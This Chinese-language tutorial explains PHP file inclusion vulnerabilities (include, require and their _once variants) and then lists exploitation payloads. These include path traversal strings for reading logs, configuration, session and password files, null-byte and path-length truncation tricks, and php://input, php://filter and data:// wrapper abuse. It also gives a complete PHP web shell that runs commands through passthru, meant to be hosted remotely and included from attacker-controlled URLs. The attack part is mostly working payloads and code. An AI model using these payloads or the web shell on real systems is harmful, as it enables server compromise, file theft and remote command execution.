php文件包含

原因：
程序员写程序的时候，不喜欢干同样的事情，也不喜欢把同样的代码（比如一些公用的函数）写几次，于是就把需要公用的代码写在一个单独的文件里面，比 如 share.php，而后在其它文件进行包含调用。服务器通过某些php函数去包含任意文件时，由于要包含的这个文件来源不明，可能是一个恶意的文件，从而造成攻击。

涉及到的函数：
include()
使用此函数，只有代码执行到此函数时才将文件包含进来，发生错误时只警告并继续执行整个php文件。
Include_once()
这个函数跟include函数作用几乎相同，只是他在导入函数之前先检测下该文件是否被导入。如果已经执行一遍那么就不重复执行了。
require()
使用此函数，只要程序执行，立即调用此函数包含文件，发生错误时，会输出错误信息并立即终止程序。
require_once()
功能和前者一样，区别在于当重复调用同一文件时，程序只调用一次。

如何利用：
1.本地文件包含漏洞
(1)普通的本地文件包含
<?php include(“includes/” . $_GET['file']); ?>
当网站对参数没有进行任何过滤时，我们可以包含一个不存在的文件就会爆出当前的绝对路径。

• 包含同路径下的文件：
  ?file=.htaccess
• 路径遍历：
  ?file=../../../../../../../../../var/lib/locate.db
  (该文件非常有趣因为它允许你搜索文件系统)
• 包含注入PHP代码的文件:
  ?file=../../../../../../../../../var/log/apache/error.log
• 包含同目录下的文件：
  ?file=.htaccess
• 目录遍历
  ?file=../…/../var/lib/flag.txt
• 包含错误的日志
  ?file=../../../var/log/access.log
• 常见的一些路径
  /var/log/apache/access_log
  /var/www/logs/access_log
  /var/log/asscess_log
• 获取web目录或者其他的配置文件
  ?file=../../../httpd.conf
• 包含上传的附件
  ?file=../../../xx.file
• 读取session文件
  /file=../../../tmp/sess_tnrdo

(2)有限制的本地包含
<?php include(“inc/” . $GET[‘file’] . “.htm”); ?>

• %00截断：
  ?file=../../../etc/pwd%00
• %00截断目录遍历
  ?../../../../www/%00
• 路径长度截断：
  ？file=../../../etc/pwd/././.[…]/././.
• 点号截断：
  ?file=../../../boot.ini/….[…]………

2.远程文件包含
如果目标主机的”allow_url_fopen”是激活的（默认是激活的），allow_url_include是激活的(默认关闭)，被包含的遍历前没有目录的限制。
我们可以指定其它 URL上的一个包含PHP代码的webshell来直接运行，比如，我先写一段运行命令的PHP代码，如下保存为cmd.txt。

<?php
if (get_magic_quotes_gpc()){
$_REQUEST["cmd"]=stripslashes($_REQUEST["cmd"]);}　//去掉转义字符（可去掉字符串中的反斜线字符）
ini_set(“max_execution_time”,0);　//设定针对这个文件的执行时间，0为不限制.
echo ”M4R10开始行”;　　　　　　 //打印的返回的开始行提示信息
passthru($_REQUEST["cmd"]);　　　//运行cmd指定的命令
echo ”M4R10结束行”;　　　　　　 //打印的返回的结束行提示信息
?>

把这个文件 保存到我们主机的服务器上（可以是不支持PHP的主机），只要能通过HTTP访问到就可以了。
构造参数page=http://www.xxx.cn/cmd.txt?cmd=ls，其中cmd后面的就是你需要执行的命令。

• 利用php流input;
  ?file=php://input
• 利用php流filter：
  ?file=php://filter/convert/resource=index.php
• 利用data URLs:
  ?file=data://text/plain;base64,URL(可以远程包含一句话木马链接)
• 利用xss执行任意代码
  ?file=http://127.0.0.1/path/xss.php?xss=phpcode
• Using data URIs:
  ?file=data://text/plain;base64,SSBsb3ZlIFBIUAo=

有限制的远程文件包含
<?php include($_GET[‘FILE’] . “.htm”); ?>
?file=http://www.baidu.com/shell
?file=http://www.baidu.com/shell.txt?
?file=http://www.baidu.com/shell.txt%23
?file=\evilshare\shell.php